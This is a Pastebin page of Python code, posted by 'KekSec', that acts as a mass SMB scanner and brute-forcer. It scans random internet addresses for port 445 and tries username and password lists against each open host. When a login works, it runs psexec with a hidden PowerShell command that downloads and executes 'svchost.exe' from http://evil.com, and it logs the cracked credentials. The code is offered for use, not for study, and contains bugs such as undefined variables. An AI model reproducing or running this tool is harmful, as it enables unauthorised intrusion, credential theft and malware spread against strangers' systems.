API tools faq
paste
KekSec

SMB MASS BRUTER AND EXPLOITER PSEXEC

KekSec
Oct 10th, 2020 (edited)
801
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.20 KB | None | 0 0
raw download clone embed print report
  1. import os
  2. from pypsexec.client import Client
  3. import socket
  4. import time
  5. import threading
  6. import itertools
  7. import random
  8.  
  9. from impacket.examples.smbclient import MiniImpacketShell
  10. from impacket.smbconnection import SMBConnection
  11. fh1=open("user.txt", "r")
  12. fh2=open("pass.txt", "r")
  13. users=fh1.read().replace("\r", "").split("\n")
  14. passwords=fh2.read().replace("\r", "").split("\n")
  15. fh1.close()
  16. fh2.close()
  17. global maxthreadsglobal
  18. maxthreadsglobal=500
  19. global globalthreads
  20. globalthreads = 0
  21.  
  22. def testPW(ip, user, passwd, fh):
  23.     global globalthreads
  24.     globalthreads += 1
  25.     try:
  26.         smbClient = SMBConnection(ip, ip, sess_port=445)
  27.        
  28.         smbClient.login(username, password, '', '', '')
  29.         os.popen("psexec \\" + ip + " -u " + user + + " -p \"" + password + " powershell -NoP -NonI -W Hidden -Exec Bypass \"(New-Object System.Net.WebClient).DownloadFile(\\\"http://evil.com/svchost.exe\\\",\\\"$env:temp\\svchost.exe\\\"); Start-Process \\\"$env:temp\\svchost.exe\\\"\"")
  30.         print("HAX0RED ----> " + ip + ":" + user + ":" + passwd)
  31.         fh.write("HAX0RED ----> " + ip + ":" + user + ":" + passwd + "\r\n")
  32.         fh.flush()
  33.         globalthreads -= 1
  34.         return True
  35.        
  36.     except Exception as e:
  37.         pass
  38.  
  39.     print("T3ST3D ----> " + ip + ":" + user + ":" + passwd)
  40.     globalthreads -= 1
  41.     return False
  42. def brute(ip, fh):
  43.     global maxthreadsglobal
  44.     global globalthreads
  45.     print("BRUTING ----> " + ip)
  46.     threads = 0
  47.     maxthreads = 50
  48.     for user in users:
  49.         for passwd in passwords:
  50.             threads += 1
  51.             if threads == maxthreads or globalthreads >= maxthreadsglobal:
  52.                 time.sleep(random.randrange(1,10))
  53.                 threads = 0
  54.             try:
  55.                 t=threading.Thread(target=testPW, args=(ip, user, passwd, fh,))
  56.                 t.start()
  57.             except:
  58.                 time.sleep(random.randrange(1,10))
  59.                 try:
  60.                     t=threading.Thread(target=testPW, args=(ip, user, passwd, fh,))
  61.                     t.start()
  62.                 except:
  63.                     pass
  64. def Scan(IP):
  65.     try:
  66.         s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  67.         s.settimeout(1)
  68.         s.connect((IP, 445))
  69.         s.close()
  70.         return True
  71.     except:
  72.         return False
  73.  
  74. def gen_IP():
  75.     not_valid = [10,127,169,172,192,185]
  76.     first = random.randrange(1,256)
  77.     while first in not_valid:
  78.         first = random.randrange(1,256)
  79.     ip = ".".join([str(first),str(random.randrange(1,256)),
  80.     str(random.randrange(1,256)),str(random.randrange(1,256))])
  81.     return ip
  82.  
  83. def gen_IP_block():
  84.     not_valid = [10,127,169,172,192,185]
  85.     first = random.randrange(1,256)
  86.     while first in not_valid:
  87.         first = random.randrange(1,256)
  88.     ip = ".".join([str(first),str(random.randrange(1,256)),
  89.     str(random.randrange(1,256))])
  90.     return ip+".0-255"
  91.  
  92. def ip_range(input_string):
  93.     octets = input_string.split('.')
  94.     chunks = [map(int, octet.split('-')) for octet in octets]
  95.     ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks]
  96.  
  97.     for address in itertools.product(*ranges):
  98.         yield '.'.join(map(str, address))
  99. def HaxThread(fh):
  100.     while 1:
  101.         try:
  102.             IP = gen_IP()
  103.             if Scan(IP):
  104.                 if Scan('.'.join(IP.split(".")[:3])+".2") and Scan('.'.join(IP.split(".")[:3])+".254"):#entire ip range most likely pointed to one server
  105.                     brute(IP,fh)
  106.                     continue
  107.                 else:
  108.                     for IP in ip_range('.'.join(IP.split(".")[:3])+".0-255"):
  109.                         if Scan(IP):
  110.                             brute(IP,fh)
  111.         except Exception as e:
  112.             print(str(e))
  113.             pass
  114.  
  115. threads = int(raw_input("Threads: "))
  116.  
  117. fh = open("smb_vulnz.txt","a")
  118. threadcount = 0
  119. for i in xrange(0,threads):
  120.     try:
  121.         threading.Thread(target=HaxThread, args=(fh,)).start()
  122.         threadcount += 1
  123.     except:
  124.         pass
  125. print("[*] Started " + str(threadcount) + " scanner threads!")
  126. print("Scanning... Press enter 3 times to stop.")
  127.  
  128. for i in range(0,3):
  129.     raw_input("")
  130.  
  131. os.kill(os.getpid(),9)
  132.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!